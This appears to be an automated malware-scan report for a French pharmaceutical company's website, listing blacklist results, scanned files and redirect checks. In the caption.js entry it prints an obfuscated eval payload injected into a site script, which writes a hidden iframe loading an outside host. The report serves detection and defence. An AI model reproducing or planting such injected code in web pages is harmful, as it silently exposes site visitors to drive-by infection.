Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=horus-pharma.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://horus-pharma.fr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://horus-pharma.fr/ | 200 OK Content-Length: 13324 Content-Type: text/html | clean |
http://horus-pharma.fr/media/system/js/caption.js | 200 OK Content-Length: 2645 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width" }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 8534 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(!window.Silverlight)window.Silverlight={};Silverlight._silverlightCount=0;Silverlight.ua=null;Silverlight.available=false;Silverlight.fwlinkRoot="http://go.microsoft.com/fwlink/?LinkID=";Silverlight.detectUserAgent=function(){var a=window.navigator.userAgent;Silverlight.ua={OS:"Unsupported",Browser:"Unsupported"};if(a.indexOf("Windows NT")>=0)Silverlight.ua.OS="Windows";else if(a.indexOf("PPC Mac OS X")>=0)Silverlight.ua.OS="MacPPC";else if(a.indexOf("Intel Mac OS X")>=0)Silverlight. <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 16904 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jeroenwijering=="undefined"){var jeroenwijering=new Object();jeroenwijering.utils=new Object()}jeroenwijering.Player=function(B,C,A){this.configuration={backgroundcolor:"ffffff",file:"video.wmv",height:"260",image:"",backcolor:"FFFFFF",frontcolor:"000000",lightcolor:"000000",screencolor:"000000",width:"320",logo:"",overstretch:"false",showicons:"true",shownavigation:"true",showstop:"false",showdigits:"true",usefullscreen:"true",usemute:"false",autostart:"false",bufferlength:"3",duratio <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 12695 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var UNDEF="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_INSTALL_ID="SWFObjectExprInst",win=window,doc=document,nav=navigator,domLoadFnArr=[],regObjArr=[],timer=null,storedAltContent=null,storedAltContentId=null,isDomLoaded=false,isExpressInstallActive=false;var ua=function(){var w3cdom=typeof doc.getElementById!=UNDEF&&typeof doc.getEle <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 2788 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof (allvideos)=="undefined"){var allvideos=new Object();allvideos.APIs=new Array()}function getUpdate(D,C,B,A){if(A=="null"){return }allvideos.APIs.each(function(E){if(E._pid==A){E._plCB(D,C,B)}})}allvideos.API=function(B){var A=null;allvideos.APIs.each(function(C){if(C._pid==B){A=C}});if(A!=null){return A}this._pid=B;this._player=null;this._item=null;this._load=null;this._width=null;this._height=null;this._state=null;this._elapsed=null;this._remaining=null;this._volume=null;this._p <!-- . --> Antivirus reports:
| ||
http://horus-pharma.fr/index.php/fr/la-societe/nos-engagements | 200 OK Content-Length: 14368 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/ | 404 Not Found Content-Length: 1442 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php | 200 OK Content-Length: 13333 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/nos-metiers | 200 OK Content-Length: 28100 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/chiffres-cles | 200 OK Content-Length: 20895 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/la-societe/historique | 200 OK Content-Length: 18684 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/produits | 200 OK Content-Length: 13179 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/ | 200 OK Content-Length: 13337 Content-Type: text/html | clean |
http://horus-pharma.fr/index.php/fr/produits/allergie | 200 OK Content-Length: 11007 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: horus-pharma.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 11 Sep 2014 05:27:38 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 11 Sep 2014 05:27:39 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb638d679640774b342e6e1748ab928=r4r0fdk5jcdjvld0m3ue4ft7v7; path=/
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie[lang]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.12
GET / HTTP/1.1
Host: horus-pharma.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 11 Sep 2014 05:27:38 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 11 Sep 2014 05:27:39 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb638d679640774b342e6e1748ab928=r4r0fdk5jcdjvld0m3ue4ft7v7; path=/
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: jfcookie[lang]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.12
Second query (visit from search engine):
GET / HTTP/1.1
Host: horus-pharma.fr
Referer: http://www.google.com/search?q=horus-pharma.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: horus-pharma.fr
Referer: http://www.google.com/search?q=horus-pharma.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.